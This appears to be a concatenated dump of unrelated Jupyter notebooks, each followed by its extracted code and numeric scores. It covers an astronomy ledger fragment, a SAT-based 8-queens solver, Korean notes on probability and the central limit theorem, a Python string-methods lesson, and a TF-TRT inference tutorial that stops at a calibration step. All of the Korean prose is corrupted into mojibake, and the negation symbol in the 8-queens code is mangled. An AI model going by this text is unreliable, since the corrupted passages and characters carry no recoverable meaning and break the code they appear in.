update = read_mtl_ledger('/global/cscratch1/sd/adamyers/egupdates/mtl/sv1/dark/sv1mtl-dark-hp-8400.ecsv')
update = Table(update)
update
uids, cnts = np.unique(update['TARGETID'], return_counts=True)
np.unique(cnts)
np.unique(update['NUMOBS'])
| 0.332961 | 0.47384 |
```
from IPython.core.display import HTML
with open('style.css', 'r') as file:
css = file.read()
HTML(css)
```
# The 8-Queens Problem
The <a href="https://en.wikipedia.org/wiki/Eight_queens_puzzle">eight queens puzzle</a> is the problem of placing eight chess queens on a chessboard so that no two queens can capture each other. In <a href="https://en.wikipedia.org/wiki/Chess">chess</a> a queen can capture another piece if this piece is either
<ol>
<li>in the same row,</li>
<li>in the same column, or</li>
<li>in the same diagonal.</li>
</ol>
The image below shows a queen in row 3, column 4. All the locations where a piece can be captured by this queen are marked with an arrow.
<img src="queen-captures.png">
We will solve this puzzle by coding it as a formula of propositional logic. This formula will be solvable iff the eight queens puzzle has a solution. We will use the algorithm of Davis and Putnam to compute the solution of this formula.
```
%run Davis-Putnam.ipynb
```
The function $\texttt{var}(r, c)$ takes a row $r$ and a column $c$ and returns the string $\texttt{'Q(}r\texttt{,}c\texttt{)'}$. This string is interpreted as a propositional variable specifying that there is a queen in row $r$ and column $c$. The image below shows how theses variables correspond to the positions on a chess board.
<img src="queens-vars.png">
```
def var(row, col):
return 'Q(' + str(row) + ',' + str(col) + ')'
var(2,5)
```
Given a set of propositional variables $S$, the function $\texttt{atMostOne}(S)$ returns a set containing a single clause that expresses the fact that **at most one** of the variables in $S$ is `True`.
```
def atMostOne(S):
return { frozenset({('ยฌ',p), ('ยฌ', q)}) for p in S
for q in S
if p != q
}
atMostOne({'a', 'b', 'c'})
```
Given a <tt>row</tt> and the size of the board $n$, the procedure $\texttt{atMostOneInRow}(\texttt{row}, n)$ computes a set of clauses that is `True` if and only there is at most one queen in $\texttt{row}$.
```
def atMostOneInRow(row, n):
return atMostOne({ var(row, col) for col in range(1,n+1) })
atMostOneInRow(3, 4)
```
Given a column <tt>col</tt> and the size of the board $n$, the procedure $\texttt{oneInColumn}(\texttt{col}, n)$ computes a set of clauses that is true if and only if there is at least one queen in the column $\texttt{col}$.
```
def oneInColumn(col, n):
return { frozenset({ var(row, col) for row in range(1,n+1) }) }
oneInColumn(2, 4)
```
Given a number $k$ and the size of the board $n$, the procedure $\texttt{atMostOneInFallingDiagonal}(k, n)$ computes a set of clauses that is `True` if and only if there is at most one queen in the falling diagonal specified by the equation
$$ \texttt{row} - \texttt{col} = k. $$
```
def atMostOneInFallingDiagonal(k, n):
S = { var(row, col) for row in range(1, n+1)
for col in range(1, n+1)
if row - col == k
}
return atMostOne(S)
atMostOneInFallingDiagonal(0, 4)
```
Given a number $k$ and the size of the board $n$, the procedure $\texttt{atMostOneInRisingDiagonal}(k, n)$ computes a set of clauses that is `True` if and only if there is at most one queen in the rising diagonal specified by the equation
$$ \texttt{row} + \texttt{col} = k. $$
```
def atMostOneInRisingDiagonal(k, n):
S = { var(row, col) for row in range(1, n+1)
for col in range(1, n+1)
if row + col == k
}
return atMostOne(S)
atMostOneInRisingDiagonal(5, 4)
```
The function $\texttt{allClauses}(n)$ takes the size of the board $n$ and computes a set of clauses that specify that
<ol>
<li>there is at most one queen in every row,</li>
<li>there is at most one queen in every rising diagonal,</li>
<li>there is at most one queen in every falling diagonal, and</li>
<li>there is at least one queen in every column.</li>
</ol>
```
def allClauses(n):
All = [ atMostOneInRow(row, n) for row in range(1, n+1) ] \
+ [ atMostOneInRisingDiagonal(k, n) for k in range(3, (2*n-1)+1) ] \
+ [ atMostOneInFallingDiagonal(k, n) for k in range(-(n-2), (n-2)+1) ] \
+ [ oneInColumn(col, n) for col in range(1, n+1) ]
return { clause for S in All for clause in S }
for C in allClauses(8):
print(set(C))
```
The set of all clauses contains 512 clauses. There are 64 variables.
```
len(allClauses(8))
```
The function $\texttt{printBoard}(I, n)$ takes a set of unit clauses $I$ that represents a propositional valuation solving the $n$ queens problem and prints the solution represented by $I$.
```
def printBoard(I, n):
if I == { frozenset() }:
return
print("-" * (8*n+1))
for row in range(1, n+1):
printEmptyLine(n)
line = "|";
for col in range(1, n+1):
if frozenset({ var(row, col) }) in I:
line += " Q |"
else:
line += " |"
print(line)
printEmptyLine(n)
print("-" * (8*n+1))
def printEmptyLine(n):
line = "|"
for col in range(1, n+1):
line += " |"
print(line)
```
The function $\texttt{queens}(n)$ solves the n queens problem.
```
def queens(n):
"Solve the n queens problem."
Clauses = allClauses(n)
Solution = solve(Clauses, set())
if Solution != { frozenset() }:
return Solution
else:
print(f'The problem is not solvable for {n} queens!')
%%time
Solution = queens(8)
```
The fact that it takes less than a second to solve the 8 queens puzzle demonstrates the efficiency of the Davis Putnam procedure.
```
printBoard(Solution, 8)
```
In order to have a more convenient view of the solution, we have to install `python-chess`.
This can be done using the following command:
```
!pip install python-chess
import chess
```
This function takes a solution, which is represented as a set of unit clauses and displays it as a chess board with n queens
```
def show_solution(Solution, n):
board = chess.Board(None) # create empty chess board
queen = chess.Piece(chess.QUEEN, True)
for row in range(1, n+1):
for col in range(1, n+1):
field_number = (row - 1) * 8 + col - 1
if frozenset({ var(row, col) }) in Solution:
board.set_piece_at(field_number, queen)
display(board)
show_solution(Solution, 8)
```
|
github_jupyter
|
from IPython.core.display import HTML
with open('style.css', 'r') as file:
css = file.read()
HTML(css)
%run Davis-Putnam.ipynb
def var(row, col):
return 'Q(' + str(row) + ',' + str(col) + ')'
var(2,5)
def atMostOne(S):
return { frozenset({('ยฌ',p), ('ยฌ', q)}) for p in S
for q in S
if p != q
}
atMostOne({'a', 'b', 'c'})
def atMostOneInRow(row, n):
return atMostOne({ var(row, col) for col in range(1,n+1) })
atMostOneInRow(3, 4)
def oneInColumn(col, n):
return { frozenset({ var(row, col) for row in range(1,n+1) }) }
oneInColumn(2, 4)
def atMostOneInFallingDiagonal(k, n):
S = { var(row, col) for row in range(1, n+1)
for col in range(1, n+1)
if row - col == k
}
return atMostOne(S)
atMostOneInFallingDiagonal(0, 4)
def atMostOneInRisingDiagonal(k, n):
S = { var(row, col) for row in range(1, n+1)
for col in range(1, n+1)
if row + col == k
}
return atMostOne(S)
atMostOneInRisingDiagonal(5, 4)
def allClauses(n):
All = [ atMostOneInRow(row, n) for row in range(1, n+1) ] \
+ [ atMostOneInRisingDiagonal(k, n) for k in range(3, (2*n-1)+1) ] \
+ [ atMostOneInFallingDiagonal(k, n) for k in range(-(n-2), (n-2)+1) ] \
+ [ oneInColumn(col, n) for col in range(1, n+1) ]
return { clause for S in All for clause in S }
for C in allClauses(8):
print(set(C))
len(allClauses(8))
def printBoard(I, n):
if I == { frozenset() }:
return
print("-" * (8*n+1))
for row in range(1, n+1):
printEmptyLine(n)
line = "|";
for col in range(1, n+1):
if frozenset({ var(row, col) }) in I:
line += " Q |"
else:
line += " |"
print(line)
printEmptyLine(n)
print("-" * (8*n+1))
def printEmptyLine(n):
line = "|"
for col in range(1, n+1):
line += " |"
print(line)
def queens(n):
"Solve the n queens problem."
Clauses = allClauses(n)
Solution = solve(Clauses, set())
if Solution != { frozenset() }:
return Solution
else:
print(f'The problem is not solvable for {n} queens!')
%%time
Solution = queens(8)
printBoard(Solution, 8)
!pip install python-chess
import chess
def show_solution(Solution, n):
board = chess.Board(None) # create empty chess board
queen = chess.Piece(chess.QUEEN, True)
for row in range(1, n+1):
for col in range(1, n+1):
field_number = (row - 1) * 8 + col - 1
if frozenset({ var(row, col) }) in Solution:
board.set_piece_at(field_number, queen)
display(board)
show_solution(Solution, 8)
| 0.501221 | 0.952662 |
# 6. Probability
## 6.1 ์ข
์์ฑ๊ณผ ๋
๋ฆฝ์ฑ
pass
## 6.2 ์กฐ๊ฑด๋ถ ํ๋ฅ
์ฝ๋๊ฐ ์ฌ๋ฐ์ด์ ๊ธฐ๋ก. ์ฌ๊ฑด์ด ์ผ์ด๋ ํ์ ๊ธฐ๋ฐ์ผ๋ก ๊ณ์ฐํ๋ค.
- `P(both | older)` : ์ฒซ์งธ๊ฐ ์ฌ์์ผ ๋, ์๋งค ๋ชจ๋ ์ฌ์์ผ ํ๋ฅ
- `P(both | either)` : ์๋งค ์ค ์ต์ 1๋ช
์ด ์ฌ์์ผ ๋, ์๋งค ๋ชจ๋ ์ฌ์์ผ ํ๋ฅ
```
import random
def random_kid():
return random.choice(["boy", "girl"])
both_girls = 0
older_girl = 0
either_girl = 0
random.seed(0)
for _ in range(10000):
younger = random_kid()
older = random_kid()
if older == "girl":
older_girl += 1
if older == "girl" and younger == "girl":
both_girls += 1
if older == "girl" or younger == "girl":
either_girl += 1
print ("P(both | older):", both_girls / older_girl)
print ("P(both | either): ", both_girls / either_girl)
```
## 6.3 ๋ฒ ์ด์ฆ ์ ๋ฆฌ
pass
## 6.4 ํ๋ฅ
### 6.4.1 ํ๋ฅ ๋ณ์(random variable)
$$
X(ฯ):ฯ\rightarrow x \\
P(X=x) = p
$$
> `ฯ`๋ผ๋ sample์ด `x`๋ผ๋ ์ซ์(์ค์นผ๋ผ or ๋ฒกํฐ)์ ๋งค์นญ๋๋ค.
> `X`๋ผ๋ ํ๋ฅ ๋ณ์๊ฐ `p`์ ํ๋ฅ ๋ก `x`์ ๊ฐ์ ๊ฐ์ง๋ค.
- ์ผ์ ํ ํ๋ฅ ์ ๊ฐ๊ณ ๋ฐ์ํ๋ ์ฌ๊ฑด(event)์ ์์น๊ฐ ๋ถ์ฌ๋๋ ๋ณ์. ์ผ๋ฐ์ ์ผ๋ก ๋๋ฌธ์ `X`๋ก ๋ํ๋ธ๋ค.
- ํ๋ฅ ๋ณ์ `X`์ ๊ตฌ์ฒด์ ์ธ ๊ฐ์ ์๋ฌธ์ `x`๋ฅผ ์ฌ์ฉ
- ๋ง์ฝ ๋์ ์ ์ผ์ด์ค์ด๊ณ , ์๋ฉด-๋ท๋ฉด์ H-T๋ก ํํํ๊ณ , ๊ฐ๊ฐ์ ํ๋ฅ ์ด 0.5๋ผ๋ฉด `P(X='H') = 0.5`๋ก ํํํ ์ ์์ ๊ฒ
### 6.4.2 Probability Function
์ฐธ๊ณ ๋งํฌ -> ๋ฐ์ดํฐ์ฌ์ด์ธ์ค์ค์ฟจ์ [ํ๋ฅ ๋ชจํ์ด๋](https://datascienceschool.net/view-notebook/56e7a25aad2a4539b3c31eb3eb787a54), [ํ๋ฅ ๋ถํฌํจ์์ ํ๋ฅ ๋ฐ๋ํจ์์ ์ฐจ์ด](https://datascienceschool.net/view-notebook/4d74d1b5651245a7903583f30ae44608/), ์คํ์ค๋ฒํ๋ก์ฐ์ [user132704 ๋ต๋ณ ๋ถ๋ถ](https://math.stackexchange.com/questions/175850/difference-between-probability-density-function-and-probability-distribution)
- ์์์ **Continuous random variable**๋ถํฐ ํ๋ค.
+ ์ด๋ค ์ฐ์์ ์ธ ๊ฐ๋ค, ์๋ฅผ ๋ค์ด ์๊ณ ๋ฐ๋์ด ๊ฐ๋ฆฌํค๋ ์์น๋ฅผ continuous random variable๋ก ์ ํ๊ฒ ๋ค.
+ ๊ฐ์ 0์์ 360 ๋ฏธ๋ง๊น์ง์ด๊ณ , 15.5๋, 20.4831๋ ๋ฑ ์ฐ์์ ์ธ ์ค์ ๊ฐ์ ๊ฐ๋๋ค.
- ํ๋ฅ ์ uniform distribution์ ๋ฐ๋ฅผ ๋ ํน์ ์์น, ์๋ฅผ ๋ค์ด ์๊ณ ๋ฐ๋์ด **1์ ์ ํํ๊ฒ ๊ฐ๋ฆฌํฌ ํ๋ฅ ์ 0**์ด๋ค. ํ๋ฅ 1์ ๋ชจ๋ variable์ ๊ฐ์๋ก ๋๋ ์ผํ๋์ง ๋ฌดํ๋๋ก ๋๋๊ธฐ ๋๋ฌธ์ 0์ด๋ค.
- ๊ทธ๋์ Continuous random variable์ Probability distribution์ ์ค๋ช
ํ๋ ค๋ฉด **๊ตฌ๊ฐ ์ ๋ณด(์์, ๋ ๊ฐ)** ๊ฐ ํ์ํ๋ค. ex) 1์์ 2 ์ฌ์ด์ผ ํ๋ฅ , 5์์ 7 ์ฌ์ด์ ํ๋ฅ ๋ฑ
- ์ฌ๊ธฐ์ ๋ ๊ฐ์ ๊ฐ์ ์ฌ์ฉํ๋ ๊ฒ์ด ์๋๋ผ, ์์ ๊ฐ์ ํน์ ๊ฐ์ ๊ณ ์ ํด์ ๋ ๊ฐ๋ง ์ฌ์ฉํด์ ๊ตฌ๊ฐ ํ๋ฅ ์ ๊ณ์ฐํ๊ณ , ๊ทธ๋ฅผ ํํํ ๊ฒ์ด **Cumulative distribution function**, **CDF**๋ค
+ ์ผ๋ฐ์ ์ผ๋ก ์์ ๊ฐ์ ์์ ๋ฌดํ๋๋ก ์ค์ ํ๊ณ
+ ๋๋ฌธ์ **F**๋ก ํจ์๋ฅผ ํํํ๋ค. F(x)๋ x๊ฐ ๋ ๊ฐ์ธ CDF์ ๊ฐ์ด๋ค.
+ $F(x)=P({X<x})=P(X<x)$
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/ca/Normal_Distribution_CDF.svg/600px-Normal_Distribution_CDF.svg.png" width="450">
- ๋ค๋ง CDF์ ๋จ์ ์ ํน์ ๊ฐ์ ํ๋ฅ ์ ํํํ ์ ์๋ค. ์ฐ๋ฆฌ๊ฐ ์ฃผ๋ก ์๊ณ ์ถ์ดํ๋ ์ ๋ณด๋ฅผ ์๊ธฐ๊ฐ ์ด๋ ต๋ค. ๊ทธ๋์ ์ด CDF์ ์ง์ ์ ๋ฏธ๋ถํด์ ๊ทธ ๊ธฐ์ธ๊ธฐ ๊ฐ์ ๊ทธ๋ํ๋ก ํํํ๊ฒ ๋๋๋ฐ ์ด๊ฒ์ด **Probability Density Function**, **PDF**๋ค.
+ -๋ฌดํ๋์์ +๋ฌดํ๋๊น์ง PDF์ ๊ฐ๋ค์ ์ ๋ถํ๋ฉด ๊ฐ์ 1์ด๋๋ค.(์ ์ฒด ํ๋ฅ ์ด 1)
+ PDF์ ๊ฐ์ 0์ด์์ด๋ค. ์์์ผ ์ ์๋ค(ํ๋ฅ ์ด๋ฏ๋ก)
- Gaussian PDF
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/74/Normal_Distribution_PDF.svg/720px-Normal_Distribution_PDF.svg.png" width="450">
- PMF: Probability Mass Function
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/8/85/Discrete_probability_distrib.svg/440px-Discrete_probability_distrib.svg.png" width="450">
## 6.5 Continuous distribution
์์์ ๋ฐ๋ก ์ ๋ฆฌํ์ผ๋ฏ๋ก pass
## 6.6 Normal distribution
Gaussian Density Function์ผ๋ก ํํ๋๋ ๋ถํฌ. parameter๊ฐ $\mu$(ํ๊ท ), $\sigma^2$(๋ถ์ฐ) 2๊ฐ ์กด์ฌ

## 6.7 Central limit theorem
์ค์ฌ๊ทนํ์ ๋ฆฌ(CLT): ๋์ผํ ํ๋ฅ ๋ถํฌ๋ฅผ ๊ฐ์ง ๋
๋ฆฝ ํ๋ฅ ๋ณ์ n๊ฐ์ ํ๊ท ์ ๋ถํฌ๋ n์ด ์ ๋นํ ํฌ๋ค๋ฉด ์ ๊ท๋ถํฌ์ ๊ฐ๊น์์ง๋ค
```
from collections import Counter
import matplotlib.pyplot as plt
import math
def bernoulli_trial(p):
return 1 if random.random() < p else 0
def binomial(p, n):
return sum(bernoulli_trial(p) for _ in range(n))
def normal_cdf(x, mu=0,sigma=1):
return (1 + math.erf((x - mu) / math.sqrt(2) / sigma)) / 2
def make_hist(p, n, num_points):
data = [binomial(p, n) for _ in range(num_points)]
# use a bar chart to show the actual binomial samples
histogram = Counter(data)
plt.bar([x - 0.4 for x in histogram.keys()],
[v / num_points for v in histogram.values()],
0.8,
color='0.75')
mu = p * n
sigma = math.sqrt(n * p * (1 - p))
# use a line chart to show the normal approximation
xs = range(min(data), max(data) + 1)
ys = [normal_cdf(i + 0.5, mu, sigma) - normal_cdf(i - 0.5, mu, sigma)
for i in xs]
plt.plot(xs,ys)
plt.show()
make_hist(0.75,100,1000)
make_hist(0.50,100,1000)
```
|
github_jupyter
|
import random
def random_kid():
return random.choice(["boy", "girl"])
both_girls = 0
older_girl = 0
either_girl = 0
random.seed(0)
for _ in range(10000):
younger = random_kid()
older = random_kid()
if older == "girl":
older_girl += 1
if older == "girl" and younger == "girl":
both_girls += 1
if older == "girl" or younger == "girl":
either_girl += 1
print ("P(both | older):", both_girls / older_girl)
print ("P(both | either): ", both_girls / either_girl)
from collections import Counter
import matplotlib.pyplot as plt
import math
def bernoulli_trial(p):
return 1 if random.random() < p else 0
def binomial(p, n):
return sum(bernoulli_trial(p) for _ in range(n))
def normal_cdf(x, mu=0,sigma=1):
return (1 + math.erf((x - mu) / math.sqrt(2) / sigma)) / 2
def make_hist(p, n, num_points):
data = [binomial(p, n) for _ in range(num_points)]
# use a bar chart to show the actual binomial samples
histogram = Counter(data)
plt.bar([x - 0.4 for x in histogram.keys()],
[v / num_points for v in histogram.values()],
0.8,
color='0.75')
mu = p * n
sigma = math.sqrt(n * p * (1 - p))
# use a line chart to show the normal approximation
xs = range(min(data), max(data) + 1)
ys = [normal_cdf(i + 0.5, mu, sigma) - normal_cdf(i - 0.5, mu, sigma)
for i in xs]
plt.plot(xs,ys)
plt.show()
make_hist(0.75,100,1000)
make_hist(0.50,100,1000)
| 0.407216 | 0.909867 |
# Advanced Strings
String objects have a variety of methods we can use to save time and add functionality. Let's explore some of them in this lecture:
```
s = 'hello world'
```
## Changing case
We can use methods to capitalize the first word of a string, or change the case of the entire string.
```
# Capitalize first word in string
s.capitalize()
s.upper()
s.lower()
```
Remember, strings are immutable. None of the above methods change the string in place, they only return modified copies of the original string.
```
s
```
To change a string requires reassignment:
```
s = s.upper()
s
s = s.lower()
s
```
## Location and Counting
```
s.count('o') # returns the number of occurrences, without overlap
s.find('o') # returns the starting index position of the first occurence
```
## Formatting
The <code>center()</code> method allows you to place your string 'centered' between a provided string with a certain length. Personally, I've never actually used this in code as it seems pretty esoteric...
```
s.center(20,'z')
```
The <code>expandtabs()</code> method will expand tab notations <code>\t</code> into spaces:
```
'hello\thi'.expandtabs()
```
## is check methods
These various methods below check if the string is some case. Let's explore them:
```
s = 'hello'
```
<code>isalnum()</code> will return True if all characters in **s** are alphanumeric
```
s.isalnum()
```
<code>isalpha()</code> will return True if all characters in **s** are alphabetic
```
s.isalpha()
```
<code>islower()</code> will return True if all cased characters in **s** are lowercase and there is
at least one cased character in **s**, False otherwise.
```
s.islower()
```
<code>isspace()</code> will return True if all characters in **s** are whitespace.
```
s.isspace()
```
<code>istitle()</code> will return True if **s** is a title cased string and there is at least one character in **s**, i.e. uppercase characters may only follow uncased characters and lowercase characters only cased ones. It returns False otherwise.
```
s.istitle()
```
<code>isupper()</code> will return True if all cased characters in **s** are uppercase and there is
at least one cased character in **s**, False otherwise.
```
s.isupper()
```
Another method is <code>endswith()</code> which is essentially the same as a boolean check on <code>s[-1]</code>
```
s.endswith('o')
```
## Built-in Reg. Expressions
Strings have some built-in methods that can resemble regular expression operations.
We can use <code>split()</code> to split the string at a certain element and return a list of the results.
We can use <code>partition()</code> to return a tuple that includes the first occurrence of the separator sandwiched between the first half and the end half.
```
s.split('e')
s.partition('l')
```
Great! You should now feel comfortable using the variety of methods that are built-in string objects!
|
github_jupyter
|
s = 'hello world'
# Capitalize first word in string
s.capitalize()
s.upper()
s.lower()
s
s = s.upper()
s
s = s.lower()
s
s.count('o') # returns the number of occurrences, without overlap
s.find('o') # returns the starting index position of the first occurence
s.center(20,'z')
'hello\thi'.expandtabs()
s = 'hello'
s.isalnum()
s.isalpha()
s.islower()
s.isspace()
s.istitle()
s.isupper()
s.endswith('o')
s.split('e')
s.partition('l')
| 0.52683 | 0.986675 |
# TF-TRT Inference from Saved Model with TensorFlow 2
In this notebook, we demonstrate the process to create a TF-TRT optimized model from a Tensorflow *saved model*.
This notebook was designed to run with TensorFlow versions 2.x which is included as part of NVIDIA NGC Tensorflow containers from version `nvcr.io/nvidia/tensorflow:19.12-tf2-py3`, that can be downloaded from the [NGC website](https://ngc.nvidia.com/catalog/containers/nvidia:tensorflow).
## Notebook Content
1. [Pre-requisite: data and model](#1)
1. [Verifying the orignal FP32 model](#2)
1. [Creating TF-TRT FP32 model](#3)
1. [Creating TF-TRT FP16 model](#4)
1. [Creating TF-TRT INT8 model](#5)
1. [Calibrating TF-TRT INT8 model with raw JPEG images](#6)
## Quick start
We will run this demonstration with a saved Resnet-v1-50 model, to be downloaded and stored at `/path/to/saved_model`.
The INT8 calibration process requires access to a small but representative sample of real training or valiation data.
We will use the ImageNet dataset that is stored in TFrecords format. Google provide an excellent all-in-one script for downloading and preparing the ImageNet dataset at
https://github.com/tensorflow/models/blob/master/research/inception/inception/data/download_and_preprocess_imagenet.sh.
To run this notebook, start the NGC TF container, providing correct path to the ImageNet validation data `/path/to/image_net` and the folder `/path/to/saved_model` containing the TF saved model:
```bash
nvidia-docker run --rm -it -p 8888:8888 -v /path/to/image_net:/data -v /path/to/saved_model:/saved_model --name TFTRT nvcr.io/nvidia/tensorflow:19.12-tf2-py3
```
Within the container, we then start Jupyter notebook with:
```bash
jupyter notebook --ip 0.0.0.0 --port 8888 --allow-root
```
Connect to Jupyter notebook web interface on your host http://localhost:8888.
<a id="1"></a>
## 1. Pre-requisite: data and model
We first install some extra packages and external dependencies needed for, e.g. preprocessing ImageNet data.
```
%%bash
pushd /workspace/nvidia-examples/tensorrt/tftrt/examples/object_detection/
bash ../helper_scripts/install_pycocotools.sh;
popd
import os
os.environ['CUDA_VISIBLE_DEVICES']='0'
import time
import logging
import numpy as np
import tensorflow as tf
print("TensorFlow version: ", tf.__version__)
from tensorflow.python.compiler.tensorrt import trt_convert as trt
from tensorflow.python.saved_model import tag_constants
logging.getLogger("tensorflow").setLevel(logging.ERROR)
# check TensorRT version
print("TensorRT version: ")
!dpkg -l | grep nvinfer
```
### Data
We verify that the correct ImageNet data folder has been mounted and validation data files of the form `validation-00xxx-of-00128` are available.
```
def get_files(data_dir, filename_pattern):
if data_dir == None:
return []
files = tf.io.gfile.glob(os.path.join(data_dir, filename_pattern))
if files == []:
raise ValueError('Can not find any files in {} with '
'pattern "{}"'.format(data_dir, filename_pattern))
return files
VALIDATION_DATA_DIR = "/data"
validation_files = get_files(VALIDATION_DATA_DIR, 'validation*')
print('There are %d validation files. \n%s\n%s\n...'%(len(validation_files), validation_files[0], validation_files[-1]))
```
### TF saved model
If not already downloaded, we will be downloading and working with a ResNet-50 v1 checkpoint from https://github.com/tensorflow/models/tree/master/official/resnet
```
%%bash
FILE=/saved_model/resnet_v1_50_2016_08_28.tar.gz
if [ -f $FILE ]; then
echo "The file '$FILE' exists."
else
echo "The file '$FILE' in not found. Downloading..."
wget -P /saved_model/ http://download.tensorflow.org/models/official/20181001_resnet/savedmodels/resnet_v1_fp32_savedmodel_NHWC.tar.gz
fi
tar -xzvf /saved_model/resnet_v1_fp32_savedmodel_NHWC.tar.gz -C /saved_model
```
### Helper functions
We define a few helper functions to read and preprocess Imagenet data from TFRecord files.
```
def deserialize_image_record(record):
feature_map = {
'image/encoded': tf.io.FixedLenFeature([ ], tf.string, ''),
'image/class/label': tf.io.FixedLenFeature([1], tf.int64, -1),
'image/class/text': tf.io.FixedLenFeature([ ], tf.string, ''),
'image/object/bbox/xmin': tf.io.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymin': tf.io.VarLenFeature(dtype=tf.float32),
'image/object/bbox/xmax': tf.io.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymax': tf.io.VarLenFeature(dtype=tf.float32)
}
with tf.name_scope('deserialize_image_record'):
obj = tf.io.parse_single_example(record, feature_map)
imgdata = obj['image/encoded']
label = tf.cast(obj['image/class/label'], tf.int32)
bbox = tf.stack([obj['image/object/bbox/%s'%x].values
for x in ['ymin', 'xmin', 'ymax', 'xmax']])
bbox = tf.transpose(tf.expand_dims(bbox, 0), [0,2,1])
text = obj['image/class/text']
return imgdata, label, bbox, text
from preprocessing import vgg_preprocess as vgg_preprocessing
def preprocess(record):
# Parse TFRecord
imgdata, label, bbox, text = deserialize_image_record(record)
#label -= 1 # Change to 0-based if not using background class
try: image = tf.image.decode_jpeg(imgdata, channels=3, fancy_upscaling=False, dct_method='INTEGER_FAST')
except: image = tf.image.decode_png(imgdata, channels=3)
image = vgg_preprocessing(image, 224, 224)
return image, label
#Define some global variables
BATCH_SIZE = 64
```
<a id="2"></a>
## 2. Verifying the orignal FP32 model
We demonstrate the conversion process with a Resnet-50 v1 model. First, we inspect the original Tensorflow model.
```
SAVED_MODEL_DIR = "/saved_model/resnet_v1_fp32_savedmodel_NHWC/1538686669/"
```
We employ `saved_model_cli` to inspect the inputs and outputs of the model.
```
!saved_model_cli show --all --dir $SAVED_MODEL_DIR
```
This give us information on the input and output tensors as `input_tensor:0` and `softmax_tensor:0` respectively. Also note that the number of output classes here is 1001 instead of 1000 Imagenet classes. This is because the network was trained with an extra background class.
```
INPUT_TENSOR = 'input_tensor:0'
OUTPUT_TENSOR = 'softmax_tensor:0'
```
Next, we define a function to read in a saved mode, measuring its speed and accuracy on the validation data.
```
def benchmark_saved_model(SAVED_MODEL_DIR, BATCH_SIZE=64):
# load saved model
saved_model_loaded = tf.saved_model.load(SAVED_MODEL_DIR, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
print(signature_keys)
infer = saved_model_loaded.signatures['serving_default']
print(infer.structured_outputs)
# prepare dataset iterator
dataset = tf.data.TFRecordDataset(validation_files)
dataset = dataset.map(map_func=preprocess, num_parallel_calls=20)
dataset = dataset.batch(batch_size=BATCH_SIZE, drop_remainder=True)
print('Warming up for 50 batches...')
cnt = 0
for x, y in dataset:
labeling = infer(x)
cnt += 1
if cnt == 50:
break
print('Benchmarking inference engine...')
num_hits = 0
num_predict = 0
start_time = time.time()
for x, y in dataset:
labeling = infer(x)
preds = labeling['classes'].numpy()
num_hits += np.sum(preds == y)
num_predict += preds.shape[0]
print('Accuracy: %.2f%%'%(100*num_hits/num_predict))
print('Inference speed: %.2f samples/s'%(num_predict/(time.time()-start_time)))
benchmark_saved_model(SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
```
<a id="3"></a>
## 3. Creating TF-TRT FP32 model
Next, we convert the native TF FP32 model to TF-TRT FP32, then verify model accuracy and inference speed.
```
FP32_SAVED_MODEL_DIR = SAVED_MODEL_DIR+"_TFTRT_FP32/1"
!rm -rf $FP32_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.FP32)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert()
converter.save(FP32_SAVED_MODEL_DIR)
benchmark_saved_model(FP32_SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
```
<a id="4"></a>
## 4. Creating TF-TRT FP16 model
Next, we convert the native TF FP32 model to TF-TRT FP16, then verify model accuracy and inference speed.
```
FP16_SAVED_MODEL_DIR = SAVED_MODEL_DIR+"_TFTRT_FP16/1"
!rm -rf $FP16_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.FP16)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert()
converter.save(FP16_SAVED_MODEL_DIR)
benchmark_saved_model(FP16_SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
```
<a id="5"></a>
## 5. Creating TF-TRT INT8 model
Creating TF-TRT INT8 inference model requires two steps:
- Step 1: Prepare a calibration dataset
- Step 2: Convert and calibrate the TF-TRT INT8 inference engine
### Step 1: Prepare a calibration dataset
Creating TF-TRT INT8 model requires a small calibration dataset. This data set ideally should represent the test data in production well, and will be used to create a value histogram for each layer in the neural network for effective 8-bit quantization.
```
num_calibration_batches = 2
# prepare calibration dataset
dataset = tf.data.TFRecordDataset(validation_files)
dataset = dataset.map(map_func=preprocess, num_parallel_calls=20)
dataset = dataset.batch(batch_size=BATCH_SIZE, drop_remainder=True)
calibration_dataset = dataset.take(num_calibration_batches)
def calibration_input_fn():
for x, y in calibration_dataset:
yield (x, )
```
### Step 2: Convert and calibrate the TF-TRT INT8 inference engine
The calibration step may take a while to complete.
```
# set a directory to write the saved model
INT8_SAVED_MODEL_DIR = SAVED_MODEL_DIR + "_TFTRT_INT8/1"
!rm -rf $INT8_SAVED_MODEL_DIR
conversion_params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
precision_mode=trt.TrtPrecisionMode.INT8)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=SAVED_MODEL_DIR,
conversion_params=conversion_params)
converter.convert(calibration_input_fn=calibration_input_fn)
converter.save(INT8_SAVED_MODEL_DIR)
```
### Benchmarking INT8 saved model
Finally we reload and verify the accuracy and performance of the INT8 saved model from disk.
```
benchmark_saved_model(INT8_SAVED_MODEL_DIR, BATCH_SIZE=BATCH_SIZE)
!saved_model_cli show --all --dir $INT8_SAVED_MODEL_DIR
```
<a id="6"></a>
## 6. Calibrating TF-TRT INT8 model with raw JPEG images
As an alternative to taking data in TFRecords format, in this section, we demonstrate the process of calibrating TFTRT INT-8 model from a directory of raw JPEG images. We asume that raw images have been mounted to the directory `/data/Calibration_data`.
As a rule of thumb, calibration data should be a small but representative set of images that is similar to what is expected in deployment. Empirically, for common network architectures trained on imagenet data, calibration data of size 500-1000 provide good accuracy. As such, a good strategy for a dataset such as imagenet is to choose one sample from each class.
```
data_directory = "/data/Calibration_data"
